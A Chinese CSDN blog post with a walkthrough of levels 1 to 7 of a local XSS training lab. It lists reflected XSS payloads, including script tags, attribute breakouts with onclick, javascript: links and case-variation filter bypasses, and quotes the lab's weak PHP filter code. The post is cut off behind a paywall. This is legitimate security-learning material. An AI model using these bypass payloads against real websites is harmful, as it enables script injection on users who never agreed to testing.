xss靶场练习

最新推荐文章于 2023-09-02 13:01:31 发布
最新推荐文章于 2023-09-02 13:01:31 发布
阅读量233 收藏
点赞数
分类专栏: 漏洞复现 文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46804551/article/details/121058884
版权

- Pass-1

127.0.0.1/xss/level1.php?name=<script>alert(1)</script>

在这里插入图片描述
通过
- Pass-2
直接插入不行,引号将其包裹起了
在这里插入图片描述

http://127.0.0.1/xss/level2.php?keyword="><script>alert(1)</script><--

在这里插入图片描述
- Pass-3
审查元素看看
在这里插入图片描述
看似和2没啥区别 但与level2不同的是,value做了校验,双引号和尖括号都被校验了
可以集合单引号和事件来触发

‘ onclick='alert(1)

在这里插入图片描述

- Pass-4
在这里插入图片描述
可以看到对< >进行了过滤
由下图可以看出是双引号包裹得
在这里插入图片描述

" οnclick="alert(1)"

在这里插入图片描述
- Pass-5
在这里插入图片描述
对script进行了过滤
看了下还是双引号包裹

过滤了

" οnclick="alert(1)"

在这里插入图片描述
看手源码
在这里插入图片描述

"><a href='javascript:alert(1)'>

在这里插入图片描述
- Pass-6
过滤

$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);

可大小写绕过

"><Script>alert(1)</script>

在这里插入图片描述
- Pass-7

ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on"
最低0.47元/天 解锁文章
. iDea.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss靶场学习
qi_SJQ_的博客
10-30 131
但为什么要这要做呢?,如果换成" onmouseover=" javascript:alert(1) ,却并不会成功,这是因为,<input type='text' value=' &#039 onmouseover=&#039 javascript:alert(1)'>只有使用单引号,转换出来的&#039才有意义 ...
xss靶场练习(二)之xss小游戏
angry_program的博客
02-13 2745
前言 话说自从网络安全修正法推出, 不敢轻易动国内的网站, 平时就打打靶场, 本文记录练习之路。 xss小游戏在线地址:http://test.ctf8.com/ xss小游戏一共二十关。 为了方便, 我把项目copy在本地。 为了方便实战效果和理解, 本文采用先通关再展示源码的排版方式。 Leve-1 有一个参数name: 再看看name在html源...
XSS靶场练习
zlloveyouforever的博客
04-30 686
XSS-labs靶场练习前十关 很详细的哦
反射型XSS靶场练习
qq_58000413的博客
09-25 1007
DVWA靶场第一关:low 直接一条alert(1)看看结果,很简单直接过关 第二关:Medium 继续接着一条alert(1)看结果,没有弹窗,接着我们看下源码 看到前端源码后,发现好像给过滤了,这时候我们需要考虑下为什么过滤 这时我们可以尝试下是不是因为这个组合导致的,不出意外应该是的 这时候我们可以尝试没有的payload,或者将通过大小写绕过alert(
XSS的基础与BUU XSS COURSE 1靶场练习
L2329794714的博客
03-29 8901
二、漏洞利用与绕过方法 两个层:WAF、代码层 1、黑名单绕过 寻找没有被过滤的标签 2、双写、大小写转换 双写:在直接将一些关键字用空字符替换的时候可以用 大小写转换:过滤的时候没考虑大小写问题 2、利用标签事件 比如标签点击、聚焦、鼠标动作事件来触发代码执行 标签闭合:注入点在标签属性中,闭合标签使注入点在=变成一个独立的标签 3、HTML实体编码和js编码 html实体解析也不是在构建DOM树时解
一个用于练习XSS靶场.zip
最新发布
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
WEB渗透学习-XSS-labs靶场
04-20
XSS-labs为WEB渗透中跨站脚本攻击专项练习靶场,内含多种攻击方式,采用关卡制,由易到难,适合刚接触该漏洞的新手巩固练习
WEB渗透学习-pikachu靶场练习
04-20
pikachu是一个开源靶场,适用于新手学习WEB安全时练习使用,内涵XSS漏洞、sql注入漏洞、SEC漏洞、文件上传(下载)漏洞、文件包含漏洞以及越权漏洞等
xsser.7z漏洞练习靶场
01-03
xss漏洞练习
渗透练习-XVWA渗透测试靶场
01-26
Xtreme Vulnerable Web Application (XVWA)是一款使用PHP/MySQL编写的靶场,可以帮助初学者快速学习安全姿势巩固渗透测试知识。建议将这个靶场部署在本地服务器来提升你的能力。 指令:XVWA采用一站式安装,你可以在windows, linux 或 Mac平台下进行设置,为了能正常使用XVMA你需要按以下几个步骤配置Apache-PHP-MYSQL环境,这里我们使用的是XAMP,你也可以自己选择喜欢的集成包。 将xvwa文件复制到你的web目录,确保目录名依旧为xvwa。 配合kali效果更佳
xss dvwa靶场练习
weixin_43353955的博客
06-10 48
函数介绍函数在指定的预定义前添加。这些字符是单引号(")、双引号(“”)、反斜线(\)与NUL(NULL字符)。message输入常规测试语句会被过滤但name不会< img src='javascript:alert(123)'>标签在使用时取决于浏览器不一定可以成功。
(网安小白)XSS靶场练习
qq_52958658的博客
05-20 159
学习记录
xss-labs靶场
newlife1441的博客
07-29 783
靶场搭建,可以从Github上下载或者直接下载下面的资源入门级别的xss-labs靶场,有需要的自行下载搭建,搭建过程可以参考网上的资料-网络安全文档类资源-CSDN下载入门级别的xss-labs靶场,适合新入门的学生进行练习,希望你可以从中学习到一些解题的相关技巧和关更多下载资源、学习资料请访问CSDN下载频道.https。......
pikachu靶场练习——XSS详解
qq_42176496的博客
09-04 2650
pikachu靶场 XSS详解
xss-labs靶场实战全通关详细过程(xss靶场详解)
热门推荐
金 帛的博客
07-13 2万+
xss靶场一到二十关通关详细教程
xss前十二关靶场练习
weixin_62870380的博客
09-02 482
xss漏洞原理,分类,以及xss漏洞靶场前十二关通关。
xss-labs靶场一到十关
zxcvbnm123456x的博客
06-26 759
xss靶场地址为:http://test.ctf8.com/需要先打开phpstudy才能进行练习
反射型 xss靶场练习
09-27
在反射型XSS靶场练习中,可以使用以下步骤来进行练习: 1. 首先,找到一个含有反射型XSS漏洞的目标网站。 2. 在目标网站的输入框或URL参数中插入恶意代码,例如<script>alert("XSS")。 3. 提交输入或发送包含恶意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值